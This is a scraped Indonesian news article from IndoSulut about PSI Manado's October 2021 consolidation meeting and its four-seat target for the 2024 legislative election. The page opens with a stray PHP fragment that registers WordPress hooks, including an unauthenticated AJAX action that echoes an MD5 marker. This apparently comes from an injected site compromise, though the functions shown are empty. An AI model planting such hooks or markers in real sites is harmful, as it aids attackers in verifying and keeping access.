function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Gelar Rapat Konsolidasi, PSI Manado Targetkan 4 Kursi di Pileg 2024 – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 26 Okt 2021 21:48 WIB ·

Gelar Rapat Konsolidasi, PSI Manado Targetkan 4 Kursi di Pileg 2024


					Gelar Rapat Konsolidasi, PSI Manado Targetkan 4 Kursi di Pileg 2024 Perbesar

Jurani Rurubua saat menyampaikan sambutan di rapat konsolidasi DPD PSI Kota Manado.

 

MANADO -DPD Partai Solidaritas Indonesia (PSI) Kota Manado menggelar rapat konsolidasi bersama pengurus DPC Kecamatan dan Direktoral dalam rangka memantapkan kepengurusan serta penjaringan anggota baru dari Partai besutan Grace Natalie ini. Rapat Konsolidasi digelar di Basecamp PSI Manado yang bertempat di Kelurahan Tikala Kumaraka, Selasa (26/10/2021) siang tadi.

“Rapat konsolidasi ini sebagai perkenalan para pengurus baru yang ada di DPD PSI Kota Manado, sekaligus menyampaikan target PSI Kota Manado kedepannya. Kami memiliki target untuk Pemilihan Legislatif Manado PSI mendapatkan minimal 4 kursi,” kata Ketua DPD PSI Manado Jurani Rurubua S.ST.

Ia mengatakan, target PSI untuk Kota Manado sudah melalui perhitungan politik berdasarkan progresif perkembangan kecintaan masyarakat kepada PSI.

“Sekarang hanya saya kader PSI yang duduk di lembaga DPRD Manado dan Bro Melki di DPRD Sulut. Tetapi kinerja kami jelas dan terukur diketahui oleh masyarakat. Paling tidak kami bisa memberikan contoh yang baik sebagai anggota DPRD, dan bisa membantu masyarakat di saat-saat mereka membutuhkan bantuan,” kata Jurani Rurubua.

Selain itu, dalam rapat yang juga dihadiri Ketua DPW PSI Sulut Melky Pangemanan, Jurani juga menyampaikan keuangan masuk dan keluar di DPD PSI Manado.

“Dalam rapat hari ini kami sebagai pengurus juga menyampaikan laporan keuangan kepada anggota dan kader PSI Kota Manado, supaya tidak ada salah paham terkait keuangan yang ada di perbendaharaan Partai. Seperti yang sudah kita ketahui, bahwa Partai PSI mendapatkan bantuan uang dari Kesbangpol berdasarkan hasil Pileg tahun 2019 lalu. Kami mendapatkan sekitar Rp. 35 Juta, namun sudah digunakan untuk pembayaran sewa Basecamp dan untuk perbaikan gedung ini,” kata Jurani.

Sementara itu, Melky Pangemanan saat menyampaikan sambutan memberikan apresiasi kepada PSI Kota Manado.

“Kami memberikan apresiasi kepada PSI Kota Manado dibawah kepemimpinan sist Jurani Rurubua.
Progresnya sangat baik, sehingga PSI Kota Manado menjadi teladan bagi kader-kader PSI di Sulut bahkan Indonesia,” katanya.

Selain itu, Pangemanan juga mengatakan keanggotaan PSI setiap tahun memiliki peningkatan yang sangat besar. Untuk itu, PSI memiliki target yang lebih nesar dari Pileg 2019 lalu.

“Dari target 4 kursi untuk Kota Manado kita tidak sembarang, tapi semuanya sudah kita ukur berdasarkan standar yang tinggi. Di Pileg 2019 banyak sekali yang ingin masuk di PSI untuk maju, tetapi kami sangat selektif memilih calon. Karena PSI memiliki standar yang tinggi untuk menentukan calon,” pungkasnya.

Artikel ini telah dibaca 21 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter

16 Februari 2024 - 01:06 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Trending di MANADO